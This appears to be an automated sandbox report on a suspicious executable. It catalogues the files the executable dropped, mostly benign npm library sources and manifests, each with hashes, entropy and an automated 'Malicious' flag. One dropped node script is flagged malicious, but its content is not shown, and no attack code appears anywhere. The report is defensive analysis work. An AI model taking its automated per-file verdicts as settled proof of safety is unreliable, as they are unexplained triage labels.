              Preview:'use strict'..const npa = require('npm-package-arg').const semver = require('semver').const { checkEngine } = require('npm-install-checks').const normalizeBin = require('npm-normalize-package-bin')..const engineOk = (manifest, npmVersion, nodeVersion) => {. try {. checkEngine(manifest, npmVersion, nodeVersion). return true. } catch (_) {. return false. }.}..const isBefore = (verTimes, ver, time) =>. !verTimes || !verTimes[ver] || Date.parse(verTimes[ver]) <= time..const avoidSemverOpt = { includePrerelease: true, loose: true }.const shouldAvoid = (ver, avoid) =>. avoid && semver.satisfies(ver, avoid, avoidSemverOpt)..const decorateAvoid = (result, avoid) =>. result && shouldAvoid(result.version, avoid). ? { ...result, _shouldAvoid: true }. : result..const pickManifest = (packument, wanted, opts) => {. const {. defaultTag = 'latest',. before = null,. nodeVersion = process.version,. npmVersion = null,. includeStaged = false,. avoid = null,. avoi
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1468
              Entropy (8bit):4.6768066334264216
              Encrypted:false
              SSDEEP:
              MD5:17C6A659ECBEA12179F3E93AFFC39DBA
              SHA1:4436CFED54499ECD0A970158715DC81D47DB4B56
              SHA-256:5DC223525B0D09599D01F43C8540BE6F769708642D3733508AD4287D3BEB9C07
              SHA-512:3D6FEFF045BC25629465B02A47FBA1338A34AEFA4896D3F5C678DC3B4A92CC80A71E6A9F41A675CF681B60370B2055C1D47808791736B659D087457DE1685E07
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "npm-pick-manifest",. "version": "9.0.0",. "description": "Resolves a matching manifest from a package metadata document according to standard npm semver resolution rules.",. "main": "./lib",. "files": [. "bin/",. "lib/". ],. "scripts": {. "coverage": "tap",. "lint": "eslint \"**/*.js\"",. "test": "tap",. "posttest": "npm run lint",. "postlint": "template-oss-check",. "lintfix": "npm run lint -- --fix",. "snap": "tap",. "template-oss-apply": "template-oss-apply --force". },. "repository": {. "type": "git",. "url": "https://github.com/npm/npm-pick-manifest.git". },. "keywords": [. "npm",. "semver",. "package manager". ],. "author": "GitHub Inc.",. "license": "ISC",. "dependencies": {. "npm-install-checks": "^6.0.0",. "npm-normalize-package-bin": "^3.0.0",. "npm-package-arg": "^11.0.0",. "semver": "^7.3.5". },. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.18.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):7553
              Entropy (8bit):4.766274058935108
              Encrypted:false
              SSDEEP:
              MD5:029BFDEF40D2A7501229A4799CACB4EB
              SHA1:5A9171126D3013AAA121828AEAC3625E460E95C6
              SHA-256:B0DE215F95DC137D52037CF0430AB0722805F2ED9333DD5623C52472E87D1A7D
              SHA-512:1567F73E0F3935A6B1BE19F728B39A10183DEB2E34CF03639DD361D822C5051C63E9EB757FAC01471A826C22C11381DFE156121E6ABBF42858A16355EA579703
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const fetch = require('npm-registry-fetch').const { HttpErrorBase } = require('npm-registry-fetch/lib/errors').const EventEmitter = require('events').const os = require('os').const { URL } = require('url').const log = require('proc-log')..// try loginWeb, catch the "not supported" message and fall back to couch.const login = (opener, prompter, opts = {}) => {. const { creds } = opts. return loginWeb(opener, opts).catch(er => {. if (er instanceof WebLoginNotSupported) {. log.verbose('web login not supported, trying couch'). return prompter(creds). .then(data => loginCouch(data.username, data.password, opts)). } else {. throw er. }. }).}..const adduser = (opener, prompter, opts = {}) => {. const { creds } = opts. return adduserWeb(opener, opts).catch(er => {. if (er instanceof WebLoginNotSupported) {. log.verbose('web adduser not supported, trying couch'). return prompter(creds). .then(data => adduserCouch(data.usernam
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1270
              Entropy (8bit):4.687317315187694
              Encrypted:false
              SSDEEP:
              MD5:3E3E18696D6A03AD6A41ABBE587E1056
              SHA1:0813E2BBD19D66E2AFB982A18DABEC26D05BAC29
              SHA-256:FE9700419F5E66A52B7B337200CCED69E5E0EC539FB09925CD76A4FCA970F027
              SHA-512:4EFF5A96E8EC1C803CEEEE9E7740F3871CC552F144A11E4E023A4D69F3C9422FD619F262B6EE72172DA319E28465A2FDFEF0F0D7CFC0E6CB84A8990998B0861A
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "npm-profile",. "version": "9.0.0",. "description": "Library for updating an npmjs.com profile",. "keywords": [],. "author": "GitHub Inc.",. "license": "ISC",. "dependencies": {. "npm-registry-fetch": "^16.0.0",. "proc-log": "^3.0.0". },. "main": "./lib/index.js",. "repository": {. "type": "git",. "url": "https://github.com/npm/npm-profile.git". },. "files": [. "bin/",. "lib/". ],. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.18.0",. "nock": "^13.2.4",. "tap": "^16.0.1". },. "scripts": {. "posttest": "npm run lint",. "test": "tap",. "snap": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "lintfix": "npm run lint -- --fix",. "template-oss-apply": "template-oss-apply --force". },. "tap": {. "check-coverage": true,. "nyc-arg": [. "--exclude",. "tap-snapshots/**". ]. },. "engines": {. "node": "^16.14.0 || >=18.0.0". },.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):5374
              Entropy (8bit):4.754417442185832
              Encrypted:false
              SSDEEP:
              MD5:63C585EFFA203A7E936AFDD6A4188FEF
              SHA1:B7392483B228E513F38C63145282E3FD2616D26B
              SHA-256:FC50E1FA09F89B75EEBFB632D7C4063A26881EC10791246AE4B30CFC47A8BD84
              SHA-512:4418EC92C8CB1CB62C5725CCFEB756B7245D9761F03568CBF65DA705EB4783CD28C18A83E58E9A7D52A67B9A1FCBB5F9C003D1585F30C999D82024E98C9D3264
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.const fs = require('fs').const npa = require('npm-package-arg').const { URL } = require('url')..// Find the longest registry key that is used for some kind of auth.// in the options. Returns the registry key and the auth config..const regFromURI = (uri, opts) => {. const parsed = new URL(uri). // try to find a config key indicating we have auth for this registry. // can be one of :_authToken, :_auth, :_password and :username, or. // :certfile and :keyfile. // We walk up the "path" until we're left with just //<host>[:<port>],. // stopping when we reach '//'.. let regKey = `//${parsed.host}${parsed.pathname}`. while (regKey.length > '//'.length) {. const authKey = hasAuth(regKey, opts). // got some auth for this URI. if (authKey) {. return { regKey, authKey }. }.. // can be either //host/some/path/:_auth or //host/some/path:_auth. // walk up by removing EITHER what's after the slash OR the slash itself. regKey = regKey.replace(/([^/]+|\/)$
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3266
              Entropy (8bit):4.6545647502682295
              Encrypted:false
              SSDEEP:
              MD5:007A5EABDA41936DDCCA7890D6954947
              SHA1:AAD3648C45DED2DD7065A42185436BC624AF143C
              SHA-256:4D40C6A298637C16FC15B8D3C43FD1C58B9A09E4FFE46F153AA37F14BB816E35
              SHA-512:46FE936E8646D8E6C3B7DEFBB17A4FDA4471E40D8791AFE9FA2EDAF2C10B000E4853B0D8894F608A24453360FFE7C1BD492A05B91FBDE0192C935DE9DA1A9253
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const errors = require('./errors.js').const { Response } = require('minipass-fetch').const defaultOpts = require('./default-opts.js').const log = require('proc-log').const cleanUrl = require('./clean-url.js')../* eslint-disable-next-line max-len */.const moreInfoUrl = 'https://github.com/npm/cli/wiki/No-auth-for-URI,-but-auth-present-for-scoped-registry'.const checkResponse =. async ({ method, uri, res, startTime, auth, opts }) => {. opts = { ...defaultOpts, ...opts }. if (res.headers.has('npm-notice') && !res.headers.has('x-local-cache')) {. log.notice('', res.headers.get('npm-notice')). }.. if (res.status >= 400) {. logRequest(method, res, startTime). if (auth && auth.scopeAuthKey && !auth.token && !auth.auth) {. // we didn't have auth for THIS request, but we do have auth for. // requests to the registry indicated by the spec's scope value.. // Warn the user.. log.warn('registry', `No auth for URI, but auth present for
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):564
              Entropy (8bit):4.9868969966576815
              Encrypted:false
              SSDEEP:
              MD5:DC8C7284DFAD7AE0C562D899A1917EB4
              SHA1:FD2AF4577DCE6CDC2095DEB626C09B3FDE342EC5
              SHA-256:70B9502C5939091F893FC75DC964B6FA9A0F28AD8B6E69B2B592A802DBC57C96
              SHA-512:452C3D940A1ADD9F60CA22460FA6A83DC805DC7ED2C8B8C549093A1D27A8736841A155F22A3F0D72F798166A45321AE8BEB1782FF9F709F260629E6DD4634627
              Malicious:false
              Reputation:unknown
              Preview:const { URL } = require('url')..const replace = '***'.const tokenRegex = /\bnpm_[a-zA-Z0-9]{36}\b/g.const guidRegex = /\b[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\b/g..const cleanUrl = (str) => {. if (typeof str !== 'string' || !str) {. return str. }.. try {. const url = new URL(str). if (url.password) {. url.password = replace. str = url.toString(). }. } catch {. // ignore errors. }.. return str. .replace(tokenRegex, `npm_${replace}`). .replace(guidRegex, `npm_${replace}`).}..module.exports = cleanUrl.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):386
              Entropy (8bit):4.84360059251981
              Encrypted:false
              SSDEEP:
              MD5:597315A3ED8DD406779DAA38D975A62F
              SHA1:B27C348D13E419894BF18D596AD2C5A67A4E3BB5
              SHA-256:ACE91C62BDCCB1E4EA86DB3C4D497AE64C6B8F5A91D3783288CFF2CE2FD4F840
              SHA-512:E113D7F7F33154B4328BF2C32C72522D35FBE8D9EC64EE71AE42D2D85E80B8087C35B51737C2A811E56B1060D3C9445469ABF694F41229ADEC45F9808F33FBF5
              Malicious:false
              Reputation:unknown
              Preview:const pkg = require('../package.json').module.exports = {. maxSockets: 12,. method: 'GET',. registry: 'https://registry.npmjs.org/',. timeout: 5 * 60 * 1000, // 5 minutes. strictSSL: true,. noProxy: process.env.NOPROXY,. userAgent: `${pkg.name. }@${. pkg.version. }/node@${. process.version. }+${. process.arch. } (${. process.platform. })`,.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2288
              Entropy (8bit):4.774138824808288
              Encrypted:false
              SSDEEP:
              MD5:26BE9AABCD1FC7D4FBE4030715B0C5D9
              SHA1:B99757A07140F2BEAD4303658A753F842076B118
              SHA-256:5B628A3A904D79398AA6E5C0B95A2693A13C26E511E65E00B82C7C5CBC231E1D
              SHA-512:E7D1CD7EB4BA8F19E4964A4BC23008BFCE2DD4E315B5C4BF0A03F506EB2D11C5A4B57C7FE84C68F77BA37BFD274AECB598AF0FF5FEC871F62A058E82435ABA71
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const url = require('url')..function packageName (href) {. try {. let basePath = new url.URL(href).pathname.slice(1). if (!basePath.match(/^-/)) {. basePath = basePath.split('/'). var index = basePath.indexOf('_rewrite'). if (index === -1) {. index = basePath.length - 1. } else {. index++. }. return decodeURIComponent(basePath[index]). }. } catch (_) {. // this is ok. }.}..class HttpErrorBase extends Error {. constructor (method, res, body, spec) {. super(). this.name = this.constructor.name. this.headers = res.headers.raw(). this.statusCode = res.status. this.code = `E${res.status}`. this.method = method. this.uri = res.url. this.body = body. this.pkgid = spec ? spec.toString() : packageName(res.url). }.}.module.exports.HttpErrorBase = HttpErrorBase..class HttpErrorGeneral extends HttpErrorBase {. constructor (method, res, body, spec) {. super(method, res, body, spec). this.mes
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):6633
              Entropy (8bit):4.778013226711051
              Encrypted:false
              SSDEEP:
              MD5:0ECFCE931EEADA0F732AD1F672607367
              SHA1:927329D131A95877DF4BC28AA898F09AD0FB1352
              SHA-256:548A0748571E2F82E6D530B8D6CDC77B6A7AA59D9099ED1B285A5094337B3305
              SHA-512:89985263E4306F001AE84847443A1BF23008A0B638F413F704015DD5CB55489C24E6274FBA93A3566ECCE97B058646682CC0ECE712D84547ED787A38BD84040E
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const { HttpErrorAuthOTP } = require('./errors.js').const checkResponse = require('./check-response.js').const getAuth = require('./auth.js').const fetch = require('make-fetch-happen').const JSONStream = require('minipass-json-stream').const npa = require('npm-package-arg').const qs = require('querystring').const url = require('url').const zlib = require('minizlib').const { Minipass } = require('minipass')..const defaultOpts = require('./default-opts.js')..// WhatWG URL throws if it's not fully resolved.const urlIsValid = u => {. try {. return !!new url.URL(u). } catch (_) {. return false. }.}..module.exports = regFetch.function regFetch (uri, /* istanbul ignore next */ opts_ = {}) {. const opts = {. ...defaultOpts,. ...opts_,. }.. // if we did not get a fully qualified URI, then we look at the registry. // config or relevant scope to resolve it.. const uriValid = urlIsValid(uri). let registry = opts.registry || defaultOpts.registry. if (!uriValid) {
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1628
              Entropy (8bit):4.723255346812162
              Encrypted:false
              SSDEEP:
              MD5:C3D3AA9E6AF6CDE35BB8B44F198F7199
              SHA1:E2946332AD40F6C76E0A3FFCA6536432EA7635B3
              SHA-256:8B1F0E565D13F04090B8E4A8507746925ED023FD4E5547754BAA7333181F3FAA
              SHA-512:40C593C063134FA77D5AE5132F5A1DF5D8E10890D5B99B551D600C0CA67F1FC81A5722ACDFDBBF2C869ABA1E56FA1EEB77267FB472BA747693D07D697D536015
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "npm-registry-fetch",. "version": "16.1.0",. "description": "Fetch-based http client for use with npm registry APIs",. "main": "lib",. "files": [. "bin/",. "lib/". ],. "scripts": {. "eslint": "eslint",. "lint": "eslint \"**/*.js\"",. "lintfix": "npm run lint -- --fix",. "test": "tap",. "posttest": "npm run lint",. "npmclilint": "npmcli-lint",. "postsnap": "npm run lintfix --",. "postlint": "template-oss-check",. "snap": "tap",. "template-oss-apply": "template-oss-apply --force". },. "repository": {. "type": "git",. "url": "https://github.com/npm/npm-registry-fetch.git". },. "keywords": [. "npm",. "registry",. "fetch". ],. "author": "GitHub Inc.",. "license": "ISC",. "dependencies": {. "make-fetch-happen": "^13.0.0",. "minipass": "^7.0.2",. "minipass-fetch": "^3.0.0",. "minipass-json-stream": "^1.0.1",. "minizlib": "^2.1.2",. "npm-package-arg": "^11.0.0",. "proc-log": "^3.0.0". },. "devDe
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1295
              Entropy (8bit):5.116074103452293
              Encrypted:false
              SSDEEP:
              MD5:89AC8EE2B7CBFF80AEA3575787F846AB
              SHA1:366076FBC660271A1C6D424852E04957E3881BB2
              SHA-256:8B8404B77EA2A20E045FBAD73DE1661091A852BFE1F4997E0B646C688F3D18E4
              SHA-512:5A86A20E2799F760DD2A033397B53325FC6615D80CD4DA535BAD1040F9FE1F865E99F1CE7734A9ACAFD35865EDE026CDFEFBA0DA7C8DCFFA77AEA26CCE831217
              Malicious:false
              Reputation:unknown
              Preview:Copyright (c) Robert Kowalski.All rights reserved...The BSD License..Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions.are met:..1. Redistributions of source code must retain the above copyright. notice, this list of conditions and the following disclaimer...2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution...THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE.IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR.PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS.BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR.CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF.SUBSTITUTE GOODS OR SERV
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1403
              Entropy (8bit):4.722286748316439
              Encrypted:false
              SSDEEP:
              MD5:DB851A32BD15E05899AA564FD5D18FE4
              SHA1:B9DF19B423ABF94AEC9C4D3DBEE373AD9B7D4672
              SHA-256:4870D8D84E38020DC37FB3ACEC03A3084791BEFFFD3BB6A952B58AEFA9670327
              SHA-512:C9F19A1CA204CD8BEA2E610E0C073230367BF59201D714D1536B79863C7026765848A145C697D206B775E80089770053DAAA0B402F6A6B5E113DCE27B32F3FB6
              Malicious:false
              Reputation:unknown
              Preview:exports.email = email.exports.pw = pw.exports.username = username.var requirements = exports.requirements = {. username: {. length: 'Name length must be less than or equal to 214 characters long',. lowerCase: 'Name must be lowercase',. urlSafe: 'Name may not contain non-url-safe chars',. dot: 'Name may not start with "."',. illegal: 'Name may not contain illegal character',. },. password: {},. email: {. length: 'Email length must be less then or equal to 254 characters long',. valid: 'Email must be an email address',. },.}..var illegalCharacterRe = new RegExp('([' + [. "'",.].join() + '])')..function username (un) {. if (un !== un.toLowerCase()) {. return new Error(requirements.username.lowerCase). }.. if (un !== encodeURIComponent(un)) {. return new Error(requirements.username.urlSafe). }.. if (un.charAt(0) === '.') {. return new Error(requirements.username.dot). }.. if (un.length > 214) {. return new Error(requirements.username.length).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1085
              Entropy (8bit):4.700895257716397
              Encrypted:false
              SSDEEP:
              MD5:0B137A0A05BE86EBF11040FEEB045189
              SHA1:CCA122BB6C3BB41B6EAF1D570CB0225EFD138A1B
              SHA-256:05E1F214CC2DD993012041D643B4EAA1E216E91349342CA9C3E9FAEB8FBC41D3
              SHA-512:7705BBA69E601BEEE1BA781C5ABBDBA7E916BB51454056C42E380E78849CA9B0A0534F3C5891DC686FFB772362C39F21790B494FD0AB1F787A94D3294FA6B380
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "npm-user-validate",. "version": "2.0.0",. "description": "User validations for npm",. "main": "lib/index.js",. "devDependencies": {. "@npmcli/eslint-config": "^4.0.1",. "@npmcli/template-oss": "4.11.0",. "tap": "^16.3.2". },. "scripts": {. "test": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force",. "lintfix": "npm run lint -- --fix",. "snap": "tap",. "posttest": "npm run lint". },. "repository": {. "type": "git",. "url": "https://github.com/npm/npm-user-validate.git". },. "keywords": [. "npm",. "validation",. "registry". ],. "author": "GitHub Inc.",. "license": "BSD-2-Clause",. "files": [. "bin/",. "lib/". ],. "engines": {. "node": "^14.17.0 || ^16.13.0 || >=18.0.0". },. "templateOSS": {. "//@npmcli/template-oss": "This file is partially managed by @npmcli/template-oss. Edits may be overwritten.",. "version": "4.11.0". },
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):9024
              Entropy (8bit):4.828128507178516
              Encrypted:false
              SSDEEP:
              MD5:C6F5CD009C2AC25A8450E4137AF6ED7D
              SHA1:081829AE7DDD7E7BCE7D77CBA34340258030AD56
              SHA-256:997590661C47FB68694CBD3CD68DD68AC2B98C34E6666EEECFD908760F8B7200
              SHA-512:08171EFDE88FEA9D73451FBDE5973865F17956AEF74D8CB51302451BCF777A2C15F81712686544302D683C19B079D1234AFD35355C35C2FA9A3E9E905AF3A2BF
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.var Progress = require('are-we-there-yet').var Gauge = require('gauge').var EE = require('events').EventEmitter.var log = exports = module.exports = new EE().var util = require('util')..var setBlocking = require('set-blocking').var consoleControl = require('console-control-strings')..setBlocking(true).var stream = process.stderr.Object.defineProperty(log, 'stream', {. set: function (newStream) {. stream = newStream. if (this.gauge) {. this.gauge.setWriteTo(stream, stream). }. },. get: function () {. return stream. },.})..// by default, decide based on tty-ness..var colorEnabled.log.useColor = function () {. return colorEnabled != null ? colorEnabled : stream.isTTY.}..log.enableColor = function () {. colorEnabled = true. this.gauge.setTheme({ hasColor: colorEnabled, hasUnicode: unicodeEnabled }).}.log.disableColor = function () {. colorEnabled = false. this.gauge.setTheme({ hasColor: colorEnabled, hasUnicode: unicodeEnabled }).}..// default level.l
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1218
              Entropy (8bit):4.675685647080967
              Encrypted:false
              SSDEEP:
              MD5:31AEC045D944FB4C6E0BE1A45CD26FDE
              SHA1:679290E78C9333DB478AB30E3263B3FF560C5E88
              SHA-256:5F8A4E521CAEAD9265BC6D32FFF91507485F8F64F83E4F585FE2153281D2E632
              SHA-512:AF9277A85258A2B2993CBE102E143760BC8594793A6A8232651AE43849E2C5B71B7C75F24A97D5AD950185610BC853D23600B25B97BBE7E489447BCC0012FD44
              Malicious:false
              Reputation:unknown
              Preview:{. "author": "GitHub Inc.",. "name": "npmlog",. "description": "logger for npm",. "version": "7.0.1",. "repository": {. "type": "git",. "url": "https://github.com/npm/npmlog.git". },. "main": "lib/log.js",. "files": [. "bin/",. "lib/". ],. "scripts": {. "test": "tap",. "npmclilint": "npmcli-lint",. "lint": "eslint \"**/*.js\"",. "lintfix": "npm run lint -- --fix",. "posttest": "npm run lint",. "postsnap": "npm run lintfix --",. "postlint": "template-oss-check",. "snap": "tap",. "template-oss-apply": "template-oss-apply --force". },. "dependencies": {. "are-we-there-yet": "^4.0.0",. "console-control-strings": "^1.1.0",. "gauge": "^5.0.0",. "set-blocking": "^2.0.0". },. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.6.1",. "tap": "^16.0.1". },. "license": "ISC",. "engines": {. "node": "^14.17.0 || ^16.13.0 || >=18.0.0". },. "tap": {. "branches": 95,. "nyc-arg": [.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):935
              Entropy (8bit):4.542537392816871
              Encrypted:false
              SSDEEP:
              MD5:D1D6962324348AD89BF780A233952C61
              SHA1:F78C8CB8D754261B59D03E867F329C2FFDEFAE45
              SHA-256:3DB73E347ECBDBAFDF8D0DB85145C877E133F5372E767360EF90C09F70AC5103
              SHA-512:9D9667F080E1534260C68A57AAF1D1DB368BD03D8C998D4B5DD3DF68DDE1889E237BB735D73D29D65BDA50C05BF87CC3637CE504BC885E32D2C908D706F3DC9F
              Malicious:false
              Reputation:unknown
              Preview:var wrappy = require('wrappy').module.exports = wrappy(once).module.exports.strict = wrappy(onceStrict)..once.proto = once(function () {. Object.defineProperty(Function.prototype, 'once', {. value: function () {. return once(this). },. configurable: true. }).. Object.defineProperty(Function.prototype, 'onceStrict', {. value: function () {. return onceStrict(this). },. configurable: true. }).})..function once (fn) {. var f = function () {. if (f.called) return f.value. f.called = true. return f.value = fn.apply(this, arguments). }. f.called = false. return f.}..function onceStrict (fn) {. var f = function () {. if (f.called). throw new Error(f.onceError). f.called = true. return f.value = fn.apply(this, arguments). }. var name = fn.name || 'Function wrapped with `once`'. f.onceError = name + " shouldn't be called more than once". f.called = false. return f.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):574
              Entropy (8bit):4.4930652660701815
              Encrypted:false
              SSDEEP:
              MD5:AFB6EA3BDCAD6397E11A71615BD06E3B
              SHA1:B2456F0417AD4F7DEC058401908740C4DA1EE7BA
              SHA-256:33840D74C14C94BFB75C76374765B635531B1EACB88D7F1F2F380C94D0EA1328
              SHA-512:8DF1B789C54D844CBBAC3AB99E82893F971F8F3D436F7319A4D2ED7757AB85B945D82F021E9AB1D6DBBB35FAB7FD1F9F84E470E525F56C4F4308ADBFA76868DC
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "once",. "version": "1.4.0",. "description": "Run a function exactly one time",. "main": "once.js",. "directories": {. "test": "test". },. "dependencies": {. "wrappy": "1". },. "devDependencies": {. "tap": "^7.0.1". },. "scripts": {. "test": "tap test/*.js". },. "files": [. "once.js". ],. "repository": {. "type": "git",. "url": "git://github.com/isaacs/once". },. "keywords": [. "once",. "function",. "one",. "single". ],. "author": "Isaac Z. Schlueter <i@izs.me> (http://blog.izs.me/)",. "license": "ISC".}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1640
              Entropy (8bit):4.8240498635438005
              Encrypted:false
              SSDEEP:
              MD5:52156C8916D49C965110282D44866995
              SHA1:5435C06290494677E8D7A3819ADFD24537818B19
              SHA-256:0948A5674610F016C9FC9CB00E966C30E4B569ECAF6C59CEB59DA956C831E208
              SHA-512:5F9D0B7A307AD7F51D4CA9E4E27AA0627E2074BD9B6260A142DEC5993D12F8E7D907832EAA5F7A6BF43696F28916117BF06AC59705699BB1A073C51CFFB314B0
              Malicious:false
              Reputation:unknown
              Preview:'use strict';.const AggregateError = require('aggregate-error');..module.exports = async (..iterable,..mapper,..{...concurrency = Infinity,...stopOnError = true..} = {}.) => {..return new Promise((resolve, reject) => {...if (typeof mapper !== 'function') {....throw new TypeError('Mapper function is required');...}....if (!((Number.isSafeInteger(concurrency) || concurrency === Infinity) && concurrency >= 1)) {....throw new TypeError(`Expected \`concurrency\` to be an integer from 1 and up or \`Infinity\`, got \`${concurrency}\` (${typeof concurrency})`);...}....const result = [];...const errors = [];...const iterator = iterable[Symbol.iterator]();...let isRejected = false;...let isIterableDone = false;...let resolvingCount = 0;...let currentIndex = 0;....const next = () => {....if (isRejected) {.....return;....}.....const nextItem = iterator.next();....const index = currentIndex;....currentIndex++;.....if (nextItem.done) {.....isIterableDone = true;......if (resolvingCount === 0) {.....
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):911
              Entropy (8bit):4.792298739805392
              Encrypted:false
              SSDEEP:
              MD5:DDE3F78CBB3BBACCCED714F86A9CA745
              SHA1:5F275DE37ED635969B147D1ADAC21FD6D36CED42
              SHA-256:6F0AEB7043D0737E5BCAF8C2BF83B4A8DED247922ACA592D684E37499D028AE7
              SHA-512:6BD18E795B6006B9EAE7E74D490BA2A2C1FDEC18A87938B8C96F8FFFD25C834F3ABC164FB6EAB327B2C0D5F994C0D8897F8CB2917E3B7CD28E0897C0ABB72E7B
              Malicious:false
              Reputation:unknown
              Preview:{.."name": "p-map",.."version": "4.0.0",.."description": "Map over promises concurrently",.."license": "MIT",.."repository": "sindresorhus/p-map",.."funding": "https://github.com/sponsors/sindresorhus",.."author": {..."name": "Sindre Sorhus",..."email": "sindresorhus@gmail.com",..."url": "https://sindresorhus.com"..},.."engines": {..."node": ">=10"..},.."scripts": {..."test": "xo && ava && tsd"..},.."files": [..."index.js",..."index.d.ts"..],.."keywords": [..."promise",..."map",..."resolved",..."wait",..."collection",..."iterable",..."iterator",..."race",..."fulfilled",..."async",..."await",..."promises",..."concurrently",..."concurrency",..."parallel",..."bluebird"..],.."dependencies": {..."aggregate-error": "^3.0.0"..},.."devDependencies": {..."ava": "^2.2.0",..."delay": "^4.1.0",..."in-range": "^2.0.0",..."random-int": "^2.0.0",..."time-span": "^3.1.0",..."tsd": "^0.7.4",..."xo": "^0.27.2"..}.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):791
              Entropy (8bit):5.036216633726007
              Encrypted:false
              SSDEEP:
              MD5:305FCF7ED7C4AA4A8E6F33DF54488D17
              SHA1:959D146990E87B9DD1EAE8815E072BD2450209C3
              SHA-256:36EC394CD0F976603CFEC687C19175A703C1C0D9DB717A76915391E756522C8E
              SHA-512:271DAAEA506DABAA0082E90C1960174D774F4B1FB360668E7B0CE8B91D0F4E59161A307AE5583032FEA40C10AE7D13CB74F5B4AFF779EE2B3DDA616F0B180C96
              Malicious:false
              Reputation:unknown
              Preview:The ISC License..Copyright (c) Isaac Z. Schlueter, Kat March.n, npm, Inc., and Contributors..Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted, provided that the above.copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES.WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF.MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR.ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES.WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN.ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR.IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:a /usr/bin/env node script, ASCII text executable
              Category:dropped
              Size (bytes):3982
              Entropy (8bit):4.6967678740250385
              Encrypted:false
              SSDEEP:
              MD5:03436E60A7EE2E9A5E368F7DC3AAEB6C
              SHA1:F27AB95322268998CC25C905BE9E6F58F9B2B91E
              SHA-256:FBCDD6E4D3EA97E03D45A908CC143760E8908B59AADF7C27384A148AE19455C7
              SHA-512:4B5037219BD8A489DA3F136904D5F3C26D63775118F4C6EB00935B49143E3B8266A8B97CAFEC70524144FFCF45B0756E6D90512AD081DB98B3076C5650311A96
              Malicious:true
              Antivirus:
